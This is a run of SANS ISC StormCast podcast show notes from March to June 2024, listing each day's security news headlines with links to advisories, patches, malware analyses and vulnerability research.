No Defender, Yes Defender https://isc.sans.edu/diary/No-Defender%2C%20Yes-Defender/30980
Fake Job Ads Lead to Stolen Cryptocurrency https://www.ic3.gov/Media/Y2024/PSA240604
Zyxel NAS Vulnerabilities https://outpost24.com/blog/zyxel-nas-critical-vulnerabilities/
6/5/2024 (5 minutes, 34 seconds)

ISC StormCast for Tuesday, June 4th, 2024

A Wireshark Lua Dissector for Fixed Field Length Protocols https://isc.sans.edu/diary/A%20Wireshark%20Lua%20Dissector%20for%20Fixed%20Field%20Length%20Protocols/30976
COX Cable Modem Admin API Weakness https://samcurry.net/hacking-millions-of-modems
Malicious Stack Overflow Answers https://www.bleepingcomputer.com/news/security/cybercriminals-pose-as-helpful-stack-overflow-users-to-push-malware/
Atlassian Confluence Data Center and Server Remote Code Execution Vuln CVE-2024-21683 https://blog.sonicwall.com/en-us/2024/05/confluence-data-center-and-server-remote-code-execution-vulnerability/
6/4/2024 (5 minutes, 33 seconds)

ISC StormCast for Monday, June 3rd, 2024

K1w1 Infostealer Uses gofile.io for Exfiltration https://isc.sans.edu/diary/%22K1w1%22%20InfoStealer%20Uses%20gofile.io%20for%20Exfiltration/30972
Kaspersky Linux Malware Scanner https://www.kaspersky.com/blog/kvrt-for-linux/51375/
Snowflake Incident https://www.helpnetsecurity.com/2024/06/01/snowflake-breach-data-theft/
HuggingFace Space Secrets Leak https://huggingface.co/blog/space-secrets-disclosure
6/3/2024 (5 minutes, 38 seconds)

ISC StormCast for Friday, May 31st, 2024

Feeding MISP with OSSEC https://isc.sans.edu/diary/Feeding%20MISP%20with%20OSSEC/30968
Checkpoint VPN https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
The Pumpkin Eclipse https://blog.lumen.com/the-pumpkin-eclipse/
Michael Dunking: Detecting Cypher Injection with Open-Source Network Intrusion Detection https://www.sans.edu/cyber-research/detecting-cypher-injection-with-open-source-network-intrusion-detection/
5/31/2024 (15 minutes, 24 seconds)

ISC StormCast for Thursday, May 30th, 2024

Is that It? Finding the Unknown: Correlations Between Honeypot Logs and PCAPs https://isc.sans.edu/diary/Is%20that%20It%3F%20%20Finding%20the%20Unknown%3A%20Correlations%20Between%20Honeypot%20Logs%20%26%20PCAPs%20%5BGuest%20Diary%5D/30962
Checkpoint 0-Day https://blog.checkpoint.com/security/enhance-your-vpn-security-posture
Okta warns of Credential Stuffing Against Customer Identity Cloud https://sec.okta.com/articles/2024/05/detecting-cross-origin-authentication-credential-stuffing-attacks
Brute Forcing Old Bitcoin Wallet Password https://www.youtube.com/watch?v=o5IySpAkThg
5/30/2024 (5 minutes, 33 seconds)

ISC StormCast for Wednesday, May 29th, 2024

Preventing SQL Injection with Python https://www.youtube.com/watch?v=1cQy9N1Xndk
PoC Exploit for CVE-2024-23108 in Fortinet FortiSIEM https://www.horizon3.ai/attack-research/cve-2024-23108-fortinet-fortisiem-2nd-order-command-injection-deep-dive/
ShrinkLocker: Turning BitLocker into ransomware https://securelist.com/ransomware-abuses-bitlocker/112643/
iconv buffer overflow PoC CVE-2024-2961 https://github.com/ambionics/cnext-exploits/
PoC for Apple Privilege Escalation bug CVE-2024-27842 https://github.com/wangtielei/POCs/tree/main/CVE-2024-27842 https://x.com/WangTielei
5/29/2024 (4 minutes, 44 seconds)

ISC StormCast for Tuesday, May 28th, 2024

Files with TXZ Extension used as malspam attachments https://isc.sans.edu/diary/Files%20with%20TXZ%20extension%20used%20as%20malspam%20attachments/30958
Google 0-Day https://chromereleases.googleblog.com/2024/05/stable-channel-update-for-desktop_23.html
Google Stops Trusting Globaltrust CA https://groups.google.com/a/ccadb.org/g/public/c/wRs-zec8w7k/m/G_9QprJ2AQAJ
Checkpoint warns of password bruteforcing https://blog.checkpoint.com/security/enhance-your-vpn-security-posture?campaign=checkpoint&eid=guvrs&advisory=1
SEC522: Defending Web Applications isc.sans.edu/j/sec522
5/28/2024 (6 minutes, 5 seconds)

ISC StormCast for Friday, May 24th, 2024

Analysis of 'redtail' file uploads to ISC Honeypot https://isc.sans.edu/diary/Analysis%20of%20%3Fredtail%3F%20File%20Uploads%20to%20ICS%20Honeypot%2C%20a%20Multi-Architecture%20Coin%20Miner%20%5BGuest%20Diary%5D/30950
Veeam Vulnerability https://www.veeam.com/kb4581
C-Root Server Lost Touch With Peers https://arstechnica.com/security/2024/05/dns-glitch-that-threatened-internet-stability-fixed-cause-remains-unclear/
Ivanti Vulnerabilities https://forums.ivanti.com/s/article/Avalanche-6-4-3-602-additional-security-hardening-and-CVE-fixed?language=en_US
Justice AV Solutions Software Backdoor https://www.rapid7.com/blog/post/2024/05/23/cve-2024-4978-backdoored-justice-av-solutions-viewer-software-used-in-apparent-supply-chain-attack/
5/24/2024 (7 minutes, 15 seconds)

ISC StormCast for Thursday, May 23rd, 2024

NMAP Scanning Without Scanning - The ipinfo API https://isc.sans.edu/diary/NMAP%20Scanning%20without%20Scanning%20%28Part%202%29%20-%20The%20ipinfo%20API/30948
Why Your WiFi Router Doubles As An Apple Airtag https://krebsonsecurity.com/2024/05/why-your-wi-fi-router-doubles-as-an-apple-airtag/#more-67551
https://account.microsoft.com/privacy/location-services-opt-out
https://answers.microsoft.com/en-us/windows/forum/all/wifi-sense-my-ssid-includes-optout-why-do-windows/1453142a-755a-476f-aa48-56d05b89e33c
https://www.computerworld.com/article/1484722/here-s-how-to-opt-out-of-google-s-wi-fi-snooping.html
https://www.privacy.org.nz/publications/commissioner-inquiries/google-s-collection-of-wifi-information-during-street-view-filming/
5/23/2024 (9 minutes, 15 seconds)

ISC StormCast for Wednesday, May 22nd, 2024

Scanning without Scanning with nmap https://isc.sans.edu/diary/Scanning%20without%20Scanning%20with%20NMAP%20%28APIs%20FTW%29/30944
iTerm2 Vulnerabilities https://vin01.github.io/piptagole/escape-sequences/iterm2/hyper/url-handlers/code-execution/2024/05/21/arbitrary-url-schemes-terminal-emulators.html
GitHub Enterprise Vulnerability CVE-2024-4985 https://nvd.nist.gov/vuln/detail/CVE-2024-4985
BitBucket Pipelines Leaking Secrets https://cloud.google.com/blog/topics/threat-intelligence/bitbucket-pipeline-leaking-secrets
Microsoft Recall Privacy https://www.microsoft.com/en-us/windows/copilot-plus-pcs?r=1#faq1
5/22/2024 (6 minutes, 39 seconds)

ISC StormCast for Tuesday, May 21st, 2024

Analyzing MSG Files https://isc.sans.edu/diary/Analyzing%20MSG%20Files/30940
Linguistic Lumberjack: Fluent Bit Vulnerability CVE-2024-4323 https://www.tenable.com/blog/linguistic-lumberjack-attacking-cloud-services-via-logging-endpoints-fluent-bit-cve-2024-4323
Fortinet FortiSIEM Command Injection Deep-Dive CVE-2023-34992 https://www.horizon3.ai/attack-research/cve-2023-34992-fortinet-fortisiem-command-injection-deep-dive/
Git Vulnerability CVE-2024-32002 PoC https://amalmurali.me/posts/git-rce/
Google Chrome CVE-2024-4947 PoC https://buptsb.github.io/blog/post/CVE-2024-4947-%20v8%20incorrect%20AccessInfo%20for%20module%20namespace%20object%20causes%20Maglev%20type%20confusion.html
5/21/2024 (5 minutes, 48 seconds)

ISC StormCast for Monday, May 20th, 2024

Another PDF Streams Example: Extracting JPEGs https://isc.sans.edu/diary/Another%20PDF%20Streams%20Example%3A%20Extracting%20JPEGs/30924
QNAP QTS QNAPping At the Wheel https://labs.watchtowr.com/qnap-qts-qnapping-at-the-wheel-cve-2024-27130-and-friends/
May 2024 Security Update Problems with Windows 2019 https://learn.microsoft.com/en-us/windows/release-health/status-windows-10-1809-and-windows-server-2019#3299msgdesc
Dlink Vulnerabilities Exploited https://www.cisa.gov/news-events/alerts/2024/05/16/cisa-adds-three-known-exploited-vulnerabilities-catalog
Ivanti PoC Exploit CVE-2024-22026 https://www.redlinecybersecurity.com/blog/exploiting-cve-2024-22026-rooting-ivanti-epmm-mobileiron-core
5/20/2024 (6 minutes, 22 seconds)

ISC StormCast for Friday, May 17th, 2024

Why yq? Adventures in XML https://isc.sans.edu/diary/Why%20yq%3F%20%20Adventures%20in%20XML/30930
Black Basta Uses Quick Assist https://www.microsoft.com/en-us/security/blog/2024/05/15/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware/
Various Chrome 0-Day Vulnerabilities https://chromereleases.googleblog.com/2024/05/stable-channel-update-for-desktop_15.html
Android Theft Protection Improvement https://blog.google/products/android/android-theft-protection/
Critical Git Update https://github.blog/2024-05-14-securing-git-addressing-5-new-vulnerabilities/
5/17/2024 (5 minutes, 21 seconds)

ISC StormCast for Thursday, May 16th, 2024

Got MFA? If not, now is the time! https://isc.sans.edu/diary/Got%20MFA%3F%20%20If%20not%2C%20Now%20is%20the%20Time!/30926
SSID Confusion: Making Wi-Fi Clients Connect to the Wrong Network CVE-2023-52424 https://www.top10vpn.com/assets/2024/05/Top10VPN-x-Vanhoef-SSID-Confusion.pdf
FIDO2 MitM Session Hijacking https://www.silverfort.com/blog/using-mitm-to-bypass-fido2/?web_view=true#but-first-some-background
5/16/2024 (5 minutes, 31 seconds)

ISC StormCast for Wednesday, May 15th, 2024

Microsoft Patches https://isc.sans.edu/diary/Microsoft%20May%202024%20Patch%20Tuesday/30920
Detecting Bluetooth Trackers https://security.googleblog.com/2024/05/google-and-apple-deliver-support-for.html
Adobe Patches https://helpx.adobe.com/security/products/acrobat/apsb24-29.html
VMWare Updates https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24280
Revoking Vulnerable Windows Boot Managers https://techcommunity.microsoft.com/t5/windows-it-pro-blog/revoking-vulnerable-windows-boot-managers/ba-p/4121735
5/15/2024 (7 minutes, 33 seconds)

ISC StormCast for Tuesday, May 14th, 2024

Apple Updates Everything https://isc.sans.edu/diary/Apple%20Patches%20Everything%3A%20macOS%2C%20iOS%2C%20iPadOS%2C%20watchOS%2C%20tvOS%20updated./30916
Juniper OpenSSH Update https://supportportal.juniper.net/s/article/2024-05-Reference-Advisory-Junos-OS-and-Junos-OS-Evolved-Multiple-CVEs-reported-in-OpenSSH?language=en_US
Malicious Go Binary Delivered via Steganography in PyPi https://blog.phylum.io/malicious-go-binary-delivered-via-steganography-in-pypi/
5/14/2024 (6 minutes, 16 seconds)

ISC StormCast for Monday, May 13th, 2024

DNS Suffixes on Windows https://isc.sans.edu/diary/DNS%20Suffixes%20on%20Windows/30912
Black Basta Ransomware Advisory https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-131a
Possible Exploitation of Arcserve Unified Data Protection Vuln https://digital.nhs.uk/cyber-alerts/2024/cc-4487
Chrome Patches 0-Day https://chromereleases.googleblog.com/2024/05/stable-channel-update-for-desktop_9.html
Solarwinds ARM Vulnerabilities https://documentation.solarwinds.com/en/success_center/arm/content/release_notes/arm_2023-2-4_release_notes.htm
5/13/2024 (5 minutes, 35 seconds)

ISC StormCast for Friday, May 10th, 2024

Analyzing PDF Streams https://isc.sans.edu/diary/Analyzing%20PDF%20Streams/30908 F5 Next Central Manager Vulnerabilities https://eclypsium.com/blog/big-vulnerabilities-in-next-gen-big-ip/ Veeam Patches https://www.veeam.com/kb4441 https://www.veeam.com/kb4509 Citrix Hypervisor Security Update CVE-2024-31497 https://support.citrix.com/article/CTX633416/citrix-hypervisor-security-update-for-cve202431497
5/10/2024 5 minutes, 53 seconds

ISC StormCast for Thursday, May 9th, 2024

Analyzing Synology Disks on Linux https://isc.sans.edu/diary/Analyzing%20Synology%20Disks%20on%20Linux/30904 RSA Panel https://www.rsaconference.com/usa/agenda/session/The%20Five%20Most%20Dangerous%20New%20Attack%20Techniques%20You%20Need%20to%20Know%20About SANS.edu Research Journal https://www.sans.edu/cyber-security-research
5/9/2024 6 minutes, 9 seconds

ISC StormCast for Wednesday, May 8th, 2024

Detecting XFinity/Comcast DNS Spoofing https://isc.sans.edu/diary/Detecting%20XFinity%20Comcast%20DNS%20Spoofing/30898 Weblogic PoC CVE-2024-21006 https://pwnull.github.io/2024/oracle%20weblogic%20CVE-2024-21006%20Double-JNDInjection%20RCE%20analyze/ https://github.com/momika233/CVE-2024-21006 PDF.js React PDF Vulnerability https://securityonline.info/cve-2024-4367-cve-2024-34342-javascript-flaw-threatens-millions-of-pdf-js-and-react-pdf-users/ Tinyproxy Response https://github.com/tinyproxy/tinyproxy/issues/533
5/8/2024 8 minutes, 13 seconds

ISC StormCast for Tuesday, May 7th, 2024

DHCP Based VPN Routing Leaks https://www.leviathansecurity.com/blog/tunnelvision Mullvad VPN DNS Traffic Leak https://mullvad.net/en/blog/dns-traffic-can-leak-outside-the-vpn-tunnel-on-android Tinyproxy Vulnerability https://talosintelligence.com/vulnerability_reports/TALOS-2023-1889
5/7/2024 6 minutes, 27 seconds

ISC StormCast for Monday, May 6th, 2024

DNS Debugging with nslookup https://isc.sans.edu/diary/nslookups+Debug+Options/30894/ Microsoft Plans DNS Lockdown https://techcommunity.microsoft.com/t5/networking-blog/announcing-zero-trust-dns-private-preview/ba-p/4110366 Microsoft Graph API Abuse https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/graph-api-threats SANSFIRE SEC522 Defending Web Applications https://www.sans.org/cyber-security-training-events/sansfire-2024/
5/6/2024 5 minutes, 32 seconds

ISC StormCast for Friday, May 3rd, 2024

Scans Probing for LB-Link and Vinga WR-AC1200 routers CVE-2023-24796 https://isc.sans.edu/diary/Scans%20Probing%20for%20LB-Link%20and%20Vinga%20WR-AC1200%20routers%20CVE-2023-24796/30890 Buffer Overflow Vulnerabilities in ArubaOS https://www.arubanetworks.com/support-services/security-bulletins/ The Cuttlefish Malware https://blog.lumen.com/eight-arms-to-hold-you-the-cuttlefish-malware/
5/3/2024 5 minutes, 33 seconds

ISC StormCast for Thursday, May 2nd, 2024

Linux Trojan - Xorddos with Filename eyshcjdmzg https://isc.sans.edu/diary/Linux%20Trojan%20-%20Xorddos%20with%20Filename%20eyshcjdmzg/30880 AWS S3 Denial of Wallet Amplification Attack https://medium.com/@maciej.pocwierz/how-an-empty-s3-bucket-can-make-your-aws-bill-explode-934a383cb8b1 https://blog.limbus-medtec.com/the-aws-s3-denial-of-wallet-amplification-attack-bc5a97cc041d EU iOS Safari Allows User Tracking https://www.mysk.blog/2024/04/28/safari-tracking/ BentoML Critical Deserialization Vuln CVE-2024-2912 https://nvd.nist.gov/vuln/detail/CVE-2024-2912
5/2/2024 6 minutes, 51 seconds

ISC StormCast for Wednesday, May 1st, 2024

Another Day, Another NAS: Attacks against Zyxel NAS326 Devices CVE-2023-4473, CVE-2023-4474 https://isc.sans.edu/diary/Another%20Day%2C%20Another%20NAS%3A%20Attacks%20against%20Zyxel%20NAS326%20devices%20CVE-2023-4473%2C%20CVE-2023-4474/30884 R-Bitrary Code Execution: Vulnerability in R's Deserialization https://hiddenlayer.com/research/r-bitrary-code-execution/ Coordinated Docker Hub Attacks using Malicious Repositories https://jfrog.com/blog/attacks-on-docker-with-millions-of-malicious-repositories-spread-malware-and-phishing-scams/ NVMe-oF/TCP Vulnerabilities https://www.cyberark.com/resources/threat-research-blog/your-nvme-had-been-syzed-fuzzing-nvme-of-tcp-driver-for-linux-with-syzkaller
5/1/2024 6 minutes, 38 seconds

ISC StormCast for Tuesday, April 30th, 2024

DLink NAS Exploit Variation https://www.qnap.com/en/security-advisory/qsa-24-09 Muddling Meerkat DNS Abuse https://blogs.infoblox.com/threat-intelligence/a-cunning-operator-muddling-meerkat-and-chinas-great-firewall/ Android TV Data Leakage https://www.youtube.com/watch?v=QiyBXXO8QpA https://www.404media.co/android-tvs-can-expose-user-email-inboxes/ SEC522: SANSFIRE https://www.sans.org/cyber-security-courses/application-security-securing-web-apps-api-microservices/ SEC522 Demo (requires free account): https://www.sans.org/ondemand/get-demo/316
4/30/2024 6 minutes, 55 seconds

ISC StormCast for Monday, April 29th, 2024

Okta warns of increase in credential stuffing https://sec.okta.com/blockanonymizers Fake payment cards used by Police in Japan https://twitter.com/vxunderground/status/1783522097425211887 Phishing Campaigns Targeting USPS https://www.akamai.com/blog/security-research/phishing-usps-malicious-domains-traffic-equal-to-legitimate-traffic Chrome 124 Breaks TLS Handshake https://www.reddit.com/r/sysadmin/comments/1carvpd/chrome_124_breaks_tls_handshake/
4/29/2024 6 minutes, 36 seconds

ISC StormCast for Friday, April 26th, 2024

Does it matter if iptables isn't running on my honeypot? https://isc.sans.edu/forums/diary/Does%20it%20matter%20if%20iptables%20isn't%20running%20on%20my%20honeypot%3F/30862/ Unplugging PlugX: Sinkholing the PlugX USB worm botnet https://blog.sekoia.io/unplugging-plugx-sinkholing-the-plugx-usb-worm-botnet/ pfSense Updates https://docs.netgate.com/advisories/index.html GitLab Updates https://about.gitlab.com/releases/2024/04/24/patch-release-gitlab-16-11-1-released/ Matthew Alan Vorhees: Prevention Strategies for Modern Living Off the Land Usage https://www.sans.edu/cyber-research/prevention-strategies-modern-living-off-land-usage/
4/26/2024 20 minutes, 28 seconds

ISC StormCast for Thursday, April 25th, 2024

API Rug Pull - The NIST NVD Database and API https://isc.sans.edu/diary/API%20Rug%20Pull%20-%20The%20NIST%20NVD%20Database%20and%20API%20%28Part%204%20of%203%29/30868 Cisco Patches Vulnerabilities and Discovers Arcane Backdoor https://blog.talosintelligence.com/arcanedoor-new-espionage-focused-campaign-found-targeting-perimeter-network-devices/ Vulnerabilities across keyboard apps reveal keystrokes to network eavesdroppers https://citizenlab.ca/2024/04/vulnerabilities-across-keyboard-apps-reveal-keystrokes-to-network-eavesdroppers/ MySQL2: Dangers of User-Defined Database Connections https://blog.slonser.info/posts/mysql2-attacker-configuration/ Netgear Nighthawk Vulnerabilities https://jvn.jp/en/vu/JVNVU91883072/
4/25/2024 6 minutes, 9 seconds

ISC StormCast for Wednesday, April 24th, 2024

Struts2 devmode Still a Problem Ten Years Later https://isc.sans.edu/forums/diary/Struts%20%22devmode%22%3A%20Still%20a%20problem%20ten%20years%20later%3F/30866/ Analyzing Forest Blizzard's Custom Post-Compromise Tool for exploiting CVE-2022-38028 https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/ April 2024 Exchange Server Hotfix Update https://techcommunity.microsoft.com/t5/exchange-team-blog/released-april-2024-exchange-server-hotfix-updates/ba-p/4120536 CVE-2024-2389: Command Injection Vulnerability in Progress Flowmon https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/ GuptiMiner: Hijacking Antivirus Updates for Distributing Backdoors and Casual Mining https://decoded.avast.io/janrubin/guptiminer-hijacking-antivirus-updates-for-distributing-backdoors-and-casual-mining/
4/24/2024 6 minutes, 22 seconds

ISC StormCast for Tuesday, April 23rd, 2024

Number of Industrial Devices Accessible From Internet Up 30 Thousand over three years https://isc.sans.edu/diary/It%20appears%20that%20the%20number%20of%20industrial%20devices%20accessible%20from%20the%20internet%20has%20risen%20by%2030%20thousand%20over%20the%20past%20three%20years/30860 Evil XDR: Turning an XDR into an Offensive Tool https://www.darkreading.com/application-security/evil-xdr-researcher-turns-palo-alto-software-into-perfect-malware GitLab Comment Bug https://www.bleepingcomputer.com/news/security/gitlab-affected-by-github-style-cdn-flaw-allowing-malware-hosting/ SEC522 Demo: https://www.sans.org/ondemand/get-demo/316
4/23/2024 6 minutes, 5 seconds

ISC StormCast for Monday, April 22nd, 2024

The CVE's They are A-Changing https://isc.sans.edu/diary/The%20CVE%27s%20They%20are%20A-Changing!/30850 CrushFTP 0-Day Vulnerability https://www.crushftp.com/crush11wiki/Wiki.jsp?page=Update https://www.reddit.com/r/crowdstrike/comments/1c88788/situational_awareness_20240419_crushftp_virtual/ GitHub Comment Bug Used to Distribute Malware https://www.bleepingcomputer.com/news/security/github-comments-abused-to-push-malware-via-microsoft-repo-urls/ YubiKey Manager Privilege Escalation https://www.yubico.com/support/security-advisories/ysa-2024-01/ Palo Alto Networks GlobalProtect Update https://security.paloaltonetworks.com/CVE-2024-3400
4/22/2024 5 minutes, 36 seconds

ISC StormCast for Friday, April 19th, 2024

Delinea Secret Server Authn Authz Bypass https://straightblast.medium.com/all-your-secrets-are-belong-to-us-a-delinea-secret-server-authn-authz-bypass-adc26c800ad3 Ivanti Avalanche PoC/Details https://www.tenable.com/security/research/tra-2024-10 Advanced Phishing Campaign https://www.lookout.com/threat-intelligence/article/cryptochameleon-fcc-phishing-kit HashiCorp go-getter update CVE-2024-3817 https://discuss.hashicorp.com/t/hcsec-2024-09-hashicorp-go-getter-vulnerable-to-argument-injection-when-fetching-remote-default-git-branches/66040 OfflRouter Virus https://blog.talosintelligence.com/offlrouter-virus-causes-upload-confidential-documents-to-virustotal/
4/19/2024 5 minutes, 6 seconds

ISC StormCast for Thursday, April 18th, 2024

Malicious PDF File As Delivery Mechanism https://isc.sans.edu/diary/Malicious%20PDF%20File%20Used%20As%20Delivery%20Mechanism/30848 Updated Palo Alto Networks GlobalProtect Guidance https://security.paloaltonetworks.com/CVE-2024-3400 Coordinated Social Engineering Takeovers of Open Source Projects https://openssf.org/blog/2024/04/15/open-source-security-openssf-and-openjs-foundations-issue-alert-for-social-engineering-takeovers-of-open-source-projects/ OpenMetaData Attacks https://www.microsoft.com/en-us/security/blog/2024/04/17/attackers-exploiting-new-critical-openmetadata-vulnerabilities-on-kubernetes-clusters/
4/18/2024 5 minutes, 19 seconds

ISC StormCast for Wednesday, April 17th, 2024

Palo Alto Networks GlobalProtect exploit public and widely exploited CVE-2024-3400 https://isc.sans.edu/forums/diary/Palo%20Alto%20Networks%20GlobalProtect%20exploit%20public%20and%20widely%20exploited%20CVE-2024-3400/30844/ PuTTY Private Key Recovery https://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/vuln-p521-bias.html Oracle Critical Patch Update https://www.oracle.com/security-alerts/cpuapr2024.html Ivanti Avalanche MDM Patches https://forums.ivanti.com/s/article/Avalanche-6-4-3-Security-Hardening-and-CVEs-addressed?language=en_US
4/17/2024 5 minutes, 33 seconds

ISC StormCast for Tuesday, April 16th, 2024

Quick Palo Alto Networks GlobalProtect Vulnerability Update CVE-2024-3400 https://isc.sans.edu/diary/30838 Delinea patches critical vulnerability in secret manager https://trust.delinea.com/?tcuUid=17aaf4ef-ada9-46d5-bf97-abd3b07daae3 Lancom Windows Setup Assistant May Reset Password https://www.lancom-systems.com/service-support/general-security-information PHP Patches https://seclists.org/oss-sec/2024/q2/113 Duo SMS and VoIP Logs Leaked https://app.securitymsp.cisco.com/e/es?e=2785&eid=opguvrs&elq=bd1c1886a59e40c09915b029a74be94e LastPass Stops Deepfake Attack https://blog.lastpass.com/posts/2024/04/attempted-audio-deepfake-call-targets-lastpass-employee
4/16/2024 6 minutes, 17 seconds

ISC StormCast for Sunday, April 14th, 2024

Palo Alto Networks GlobalProtect 0-Day CVE-2024-3400 https://security.paloaltonetworks.com/CVE-2024-3400 https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/#RespondingToCompromise
4/13/2024 5 minutes, 41 seconds

ISC StormCast for Friday, April 12th, 2024

BatBadBut: You can't securely execute commands on Windows https://flatt.tech/research/posts/batbadbut-you-cant-securely-execute-commands-on-windows/ FortiClient Linux Remote Code Execution https://www.fortiguard.com/psirt/FG-IR-23-087 Apple Threat Notifications and Protecting Against Mercenary Spyware https://support.apple.com/en-us/102174 New Technique to Trick Developers Detected in an Open Source Supply Chain Attack https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/
4/12/2024 6 minutes, 11 seconds

ISC StormCast for Thursday, April 11th, 2024

Rust Command API code execution vulnerability CVE-2024-24576 https://blog.rust-lang.org/2024/04/09/cve-2024-24576.html Adobe Updates: Magento Adobe Commerce CVE-2024-20759 CVE-2024-20758 https://helpx.adobe.com/security/products/magento/apsb24-18.html https://helpx.adobe.com/security.html Fortinet FortiOS And FortiProxy Vulnerability CVE-2023-41677 https://www.fortiguard.com/psirt/FG-IR-23-493 Smoke and Screen Mirrors Signed Backdoor CVE-2024-26234 https://news.sophos.com/en-us/2024/04/09/smoke-and-screen-mirrors-a-strange-signed-backdoor/
4/11/2024 5 minutes, 59 seconds

ISC StormCast for Wednesday, April 10th, 2024

Microsoft Patches https://isc.sans.edu/forums/diary/April%202024%20Microsoft%20Patch%20Tuesday%20Summary/30822/ D-Link NAS Backdoor https://github.com/netsecfish/dlink LG SmartTV Vulnerabilities https://www.bitdefender.com/blog/labs/vulnerabilities-identified-in-lg-webos/
4/10/2024 6 minutes, 31 seconds

ISC StormCast for Tuesday, April 9th, 2024

A Use Case for Adding Threat Hunting to Your Security Operations Team https://isc.sans.edu/diary/30816 Notepad++ Parasite Site https://notepad-plus-plus.org/news/help-to-take-down-parasite-site/ Hugging Face Pickle File Vulnerabilities https://huggingface.co/blog/hugging-face-wiz-security-blog Google Considers V8 Sandbox no longer experimental https://v8.dev/blog/sandbox
4/9/2024 5 minutes, 59 seconds

ISC StormCast for Monday, April 8th, 2024

Heartbleed 10th Anniversary https://heartbleed.com/ Possible Libarchive Backdoor Vulnerability https://github.com/libarchive/libarchive/pull/1609 Magento XML Backdoor https://sansec.io/research/magento-xml-backdoor Google Public DNS's approach to fight against cache poisoning attacks https://security.googleblog.com/2024/03/google-public-dnss-approach-to-fight.html Remote code execution (RCE) vulnerability in Brocade Fabric OS (CVE-2023-3454) https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/23215 SANS London April Evening Talk https://sans.zoom.us/webinar/register/WN_ZLLnQKCCQCywLGm-CM4xQg#/registration
4/8/2024 5 minutes, 29 seconds

ISC StormCast for Friday, April 5th, 2024

Slicing up DoNex with Binary Ninja https://isc.sans.edu/diary/Slicing%20up%20DoNex%20with%20Binary%20Ninja/30812 HTTP/2 Continuation Flood https://nowotarski.info/http2-continuation-flood-technical-details/ Dangers of CSS in HTML Email https://lutrasecurity.com/en/articles/kobold-letters/ Dan Mazzella: Infostealers in Automotive Headunits https://www.sans.edu/cyber-research/exploring-infostealer-malware-techniques-automotive-head-units/
4/5/2024 15 minutes, 11 seconds

ISC StormCast for Thursday, April 4th, 2024

Playing with xzbot: Some things you can learn from SSH traffic https://isc.sans.edu/forums/diary/Some%20things%20you%20can%20learn%20from%20SSH%20traffic/30808/
Google Proposes Device Bound Session Credentials (DBSC) https://blog.chromium.org/2024/04/fighting-cookie-theft-using-device.html
Four More Ivanti Vulnerabilities https://forums.ivanti.com/s/article/SA-CVE-2024-21894-Heap-Overflow-CVE-2024-22052-Null-Pointer-Dereference-CVE-2024-22053-Heap-Overflow-and-CVE-2024-22023-XML-entity-expansion-or-XXE-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US
Google Pixel Zero Day https://source.android.com/docs/security/bulletin/pixel/2024-04-01
4/4/2024 (6 minutes, 2 seconds)

ISC StormCast for Wednesday, April 3rd, 2024

Chrome Incognito Mode Settlement https://www.wired.com/story/google-chrome-incognito-mode-data-deletion-settlement/
Google E-Mail Sender Guidelines FAQ https://support.google.com/a/answer/14229414?hl=en&fl=1&sjid=2270464422796374445-NC
Cisco Updates and VPN Best Practices https://www.cisco.com/c/en/us/support/docs/security/secure-firewall-threat-defense/221806-password-spray-attacks-impacting-custome.html https://sec.cloudapps.cisco.com/security/center/publicationListing.x
Apache Pulsar Vulnerability https://pulsar.apache.org/security/CVE-2024-29834/
Progress Flowmon Network Monitoring Tool Vulnerability CVE-2024-2389 https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability
Wait Just an Infosec Episode with Bojan Zdrnja: Thursday April 4th 2024 10:00 EDST https://isc.sans.edu/j/xzutils (link will redirect once episode is live)
4/3/2024 (5 minutes, 39 seconds)

ISC StormCast for Tuesday, April 2nd, 2024

The amazingly scary xz sshd backdoor https://isc.sans.edu/diary/The%20amazingly%20scary%20xz%20sshd%20backdoor/30802
The xz-utils backdoor in security advisories by national CSIRTs https://isc.sans.edu/diary/The+xzutils+backdoor+in+security+advisories+by+national+CSIRTs/30800
Checking CSV Files https://isc.sans.edu/diary/Checking%20CSV%20Files/30796
Infostealers Pose Threat to macOS https://www.jamf.com/blog/infostealers-pose-threat-to-macos/
4/2/2024 (7 minutes, 9 seconds)

ISC StormCast for Monday, April 1st, 2024

xz-utils Backdoor CVE-2024-3094 https://www.openwall.com/lists/oss-security/2024/03/29/4 https://tukaani.org/xz-backdoor/ https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27
Backdoor reverse analysis https://bsky.app/profile/did:plc:x2nsupeeo52oznrmplwapppl/post/3kowjkx2njy2b
YARA Rule https://github.com/byinarie/CVE-2024-3094-info/blob/main/CVE-2024-3094.yar
Social Engineering Attempts to Include Backdoor in Distros https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067708 https://news.ycombinator.com/item?id=39866275
Github Repo (now disabled) https://github.com/tukaani-project/xz
Statements from Distributions https://www.kali.org/blog/about-the-xz-backdoor/ https://archlinux.org/news/the-xz-package-has-been-backdoored/ https://access.redhat.com/security/cve/CVE-2024-3094 https://bugs.gentoo.org/928134 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1068024
4/1/2024 (7 minutes, 37 seconds)

ISC StormCast for Friday, March 29th, 2024

From JavaScript to AsyncRAT https://isc.sans.edu/diary/From%20JavaScript%20to%20AsyncRAT/30788
TeamCity Patches https://www.jetbrains.com/privacy-security/issues-fixed/?product=TeamCity&version=2024.03
Okta Verify for Windows Auto-update Arbitrary Code Execution CVE-2024-0980 https://trust.okta.com/security-advisories/okta-verify-windows-auto-update-arbitrary-code-execution-cve-2024-0980/
Google Zero Day Report https://storage.googleapis.com/gweb-uniblog-publish-prod/documents/Year_in_Review_of_ZeroDays.pdf
